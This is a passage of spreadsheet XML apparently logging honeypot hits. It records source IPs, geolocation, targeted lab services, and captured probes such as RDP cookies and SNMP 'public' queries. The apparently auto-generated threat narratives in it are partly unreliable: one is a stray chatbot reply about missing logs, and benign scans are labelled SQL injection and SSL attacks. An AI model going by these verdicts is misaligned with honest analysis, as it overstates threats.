    <s v="NA"/>
    <s v="::ffff:68f4:57e8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided to analyze."/>
    <s v="I don't see any log data provided. Please provide the log data, and I'll analyze it according to your requirements."/>
  </r>
  <r>
    <x v="317"/>
    <x v="317"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:09:17"/>
    <d v="2025-02-26T03:36:46"/>
    <d v="2025-04-29T23:09:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:2cf1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="318"/>
    <x v="318"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:07:37"/>
    <d v="2023-07-25T09:57:26"/>
    <d v="2025-04-29T23:07:37"/>
    <n v="1515"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_NTP_H15&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_SIP_H7&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_ORACLE_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;389&amp;&amp;5900&amp;&amp;5432&amp;&amp;110&amp;&amp;1433&amp;&amp;3389&amp;&amp;6379&amp;&amp;445&amp;&amp;161&amp;&amp;3306&amp;&amp;1521&amp;&amp;NA&amp;&amp;80&amp;&amp;1080&amp;&amp;6667&amp;&amp;56203&amp;&amp;9100&amp;&amp;23&amp;&amp;21&amp;&amp;50380&amp;&amp;53356&amp;&amp;53004&amp;&amp;443&amp;&amp;54155&amp;&amp;56998&amp;&amp;52877&amp;&amp;54172&amp;&amp;54909"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;GET&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TIknxEJFu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cvYNoa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GgKhoG'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pySnCorXV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fPCiMg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OBZPsu'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CDDKwMGHS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nSpOTs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=khUukE'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61640)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61656)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,61672)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rCWoySayD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdrlkD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aOWLuA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mLYTlPcna'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Aspxxr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jJktaO'}}&amp;&amp;{Data_HTTPS:{'Host': 'psilogistic.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yjpWQSjZN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KvzQWu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UKBPmUzcN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jpGeFc'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,63472)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,63474)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gBrAyvmuu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hEyTWq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tcvzPf'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YaDAcLEwb'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,60268)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.171,60282)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1fab"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A suspicious incoming SMB connection has been detected from an IP address, indicating potential malicious access to shared resources or file systems from the internet. This could be a sign of unauthorized access attempts, such as spreading malware or stealing sensitive information. The source IP address 205.210.31.171 may be involved in this malicious activity. &amp;&amp; A potential SMB brute-force or unauthorized access attempt is being made from IP address 205.210.31.171. The attacker is attempting to connect to a shared resource on the targeted system. This could be an effort to exploit vulnerabilities in the system's file sharing capabilities. &amp;&amp; An incoming connection from an unknown IP address suggests a potential attempt to exploit a vulnerability or gain unauthorized access. This could be the beginning of a malicious interaction such as file sharing or exploitation of a service. The source IP 205.210.31.171 may indicate the origin of the suspicious activity. &amp;&amp; Unknown user attempted IMAP connection, possibly for unauthorized email access or scanning. This could indicate a reconnaissance attempt to gather information about the system's email services. The lack of further activity may suggest the attacker was detected or did not continue with malicious actions. &amp;&amp; No IMAP service activity detected, potentially indicating an unsuccessful login attempt or probing of the service. _x000a_This could be a sign of reconnaissance by malicious actors checking for exposed services._x000a_It may also indicate that no legitimate IMAP connection was made to this server. &amp;&amp; No log data provided, therefore no analysis can be done. &amp;&amp; No malicious activity detected for VNC service._x000a__x000a_No attempt was made to access or interact with the VNC service, suggesting no malicious action took place. &amp;&amp; No log data provided, cannot analyze. &amp;&amp; An attacker is attempting to establish a secure connection (TLS) for FTP authentication, which could be a prelude to unauthorized file access or upload. This indicates an initial step in a potential malicious FTP session. The attacker may try to authenticate using stolen credentials. &amp;&amp; Malicious activity detected - an attacker is attempting to establish a secure connection for authentication using TLS encryption with FTP service, possibly trying to mask malicious actions as legitimate traffic. The attempt is likely a reconnaissance or a prelude to further exploitation. This may be part of a larger attack scenario."/>
    <s v="SMB Scan &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; TLS Auth &amp;&amp; FTP TLS Attack"/>
  </r>
  <r>
    <x v="319"/>
    <x v="319"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:05:03"/>
    <d v="2023-07-25T20:16:45"/>
    <d v="2025-04-29T23:05:03"/>
    <n v="2004"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_NTP_H37&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_IRC_H28&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_IMAP_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;1521&amp;&amp;161&amp;&amp;5432&amp;&amp;57047&amp;&amp;3389&amp;&amp;445&amp;&amp;1433&amp;&amp;NA&amp;&amp;51275&amp;&amp;5900&amp;&amp;53804&amp;&amp;3306&amp;&amp;6667&amp;&amp;50326&amp;&amp;56668&amp;&amp;23&amp;&amp;1080&amp;&amp;53492&amp;&amp;389&amp;&amp;110&amp;&amp;21&amp;&amp;54821&amp;&amp;49426&amp;&amp;62812&amp;&amp;443&amp;&amp;80&amp;&amp;6379&amp;&amp;50912&amp;&amp;54839&amp;&amp;58558&amp;&amp;54654"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XYkWbVhSY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DjyGss'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Ggtwhi'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xMudcIfAp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GbJQAB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=myGDHa'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NYgLdrEcX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IkRGNY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xZCnxI'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60492)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60502)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60508)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63144)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63150)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63158)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MYimKothf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=edqgWd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EBrrAg'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57682)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57688)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,57694)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GkktwQDyh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UlHzuK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ilHSHL'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60484)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,60496)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MsFZoWMxa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YnxzvY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pAElTM'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61562)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61576)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,61590)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HsNElkOAS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=miizhL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=idUWEo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nNSSzDeWU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=owNtpt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dYaJCM'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZPgldojSs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BmNZnd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iOEZgc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SKjzvTUGo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,63776)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,62902)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.232,62912)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1fe8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No LDAP (Lightweight Directory Access Protocol) login activity detected which is unusual. _x000a_Possible indication of an attacker trying to exploit or scan the service for vulnerabilities. _x000a_Lack of login attempts might suggest a reconnaissance phase by the malicious actor. &amp;&amp; This log entry suggests that an FTP connection attempted to use SSL encryption, which may be a sign of malicious activity as it could be an attempt to encrypt communication for nefarious purposes. The user is attempting to authenticate with the server, possibly trying to establish a secure connection to carry out unauthorized actions. This behavior indicates suspicious intentions from the connecting entity. &amp;&amp; Potential brute-force attack against an Oracle database, possibly attempting to gain unauthorized access by guessing login credentials. The result of the attempt is unknown as indicated by &quot;NA&quot;, suggesting no successful login yet. Further attempts may be made to bypass security measures. &amp;&amp; An attacker is attempting to establish a secure connection for FTP authentication, likely trying to exploit vulnerabilities or gain unauthorized access to sensitive information. This could be a precursor to further malicious actions such as file transfer or data theft. The attacker's goal is to authenticate and potentially escalate privileges. &amp;&amp; The data suggests a possible authentication attempt using TLS, indicating an attempt to establish encrypted connection for malicious purposes such as scanning or exploitation of FTP vulnerability._x000a_An attacker is trying to authenticate themselves using the AUTH command with TLS enabled._x000a_This could be indicative of reconnaissance or prelude to more severe attacks."/>
    <s v="SQL Attack &amp;&amp; SSL Attack &amp;&amp; SQL Injection &amp;&amp; TLS Auth"/>
  </r>
  <r>
    <x v="320"/>
    <x v="320"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:59:25"/>
    <d v="2025-04-29T22:50:08"/>
    <d v="2025-04-29T22:59:25"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:94f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="321"/>
    <x v="321"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:51:37"/>
    <d v="2025-04-29T22:51:37"/>
    <d v="2025-04-29T22:51:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
